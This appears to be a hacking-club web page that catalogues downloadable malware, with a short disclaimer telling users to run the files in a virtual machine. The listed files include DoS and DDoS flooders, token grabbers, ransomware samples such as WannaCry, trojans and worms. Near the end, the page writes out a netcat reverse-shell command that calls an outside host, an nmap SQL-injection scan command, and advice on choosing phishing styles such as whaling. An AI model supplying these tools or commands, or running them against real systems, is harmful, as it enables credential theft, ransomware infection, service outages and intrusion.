Ethical Hacking Society
View pop-up format
Disclaimer
We do not take responsibility for any damage, or legal issues, done with these files here at AT Products LLC, Ethical Hacking Society, The Script Community, CodingHome, or Noodle Hackerspace.
Use a virtual machine, and never open them on your physical machine. As a pre-caution, download them on your VM.
More information on Virtual Machines (VM)
Slammer
Slammer (Python) Slammer Socks (Python) Slammer Terminal (Python) by CobraCommander.
Denial of Service
TSC's DoS SectionA denial-of-service (DoS) attack is a type of cyber attack in which a malicious actor aims to render a computer or other device unavailable to its intended users by interrupting the device's normal functioning. DoS attacks typically function by overwhelming or flooding a targeted machine with requests until normal traffic is unable to be processed, resulting in denial-of-service to addition users. A DoS attack is characterized by using a single computer to launch the attack.
HTTP Flooder (Python) by Nasus
Requirements (TXT) MHViP (Python) README (MD). These files are a private paid DDPS
Distributed Denial of Service
A distributed denial-of-service (DDoS) attack is a type of DoS attack that comes from many distributed sources, such as a botnet DDoS attack.
SaphryaDDOS (Python) Ping of Death (Python) UDP Flood (Python) by CobraCommander
Token Grabbers
Token Grabber (Python) by Alex Toucan
Token Grabber (Python) by wodxgod
Token Grabber (Python) by Wever
Token Grabber (7Z) Token Grabber (Python) by CobraCommander
Token Grabber (Python) by CУБΞЯC
Token Bruteforcer (Python) by Social404
Wever Recommends these steps
Token Grabber.js ss-grabber.js TutorialRansomware
DCQPKX (EXE) WannaCry (EXE) WannaCry 2 (EXE) MyDOOM (IDB) GrandCab (BIN) Unknown Windows 8 RT Virus (MSU) MYDOOM (C) Infect Files (BAT) Homemade (EXE) by CobraCommander
OS Ransomware by leonv024
Collection by Endermanch
Trojans
From The Script Community: A Trojan horse in cybersecurity is any malware that misleads users of its true intent. It may look legitimate but can take control of your computer. A Trojan is designed to damage, disrupt, steal, or in general inflict some other harmful action on your data or network.
MEMZ Trojan (ZIP | Python) Trojan 1 (BAT) Trojan 2 (BAT) Trojan 3 (BAT) Trojan 4 (BAT) Trojan 5 (BAT) by CobraCommander
Worms
Networm (TXT) by CobraCommander
Other
Doom (EXE) Techno (BAT) VirusCodes (TXT) Doom (BAT | Version 2) Unknown (BAT) Death (BAT) Crash (BAT) Unknown (BAT) Matrix (TXT) Script (BAT) Pinger and DDOS (RAR) MyDOOM_3 by CobraCommander
Reverse Shell Command on Netcat -
nc -e /bin/sh 10.0.0.1 1234
Nmap on Kali Linux SQL Injection - nmap --script=http-sql-injection <target>
Ping of Death in “C” - ping
Social Engineering - "Spearhead phishing is effective but try something like whaling or watering hole" See Phishing Defintions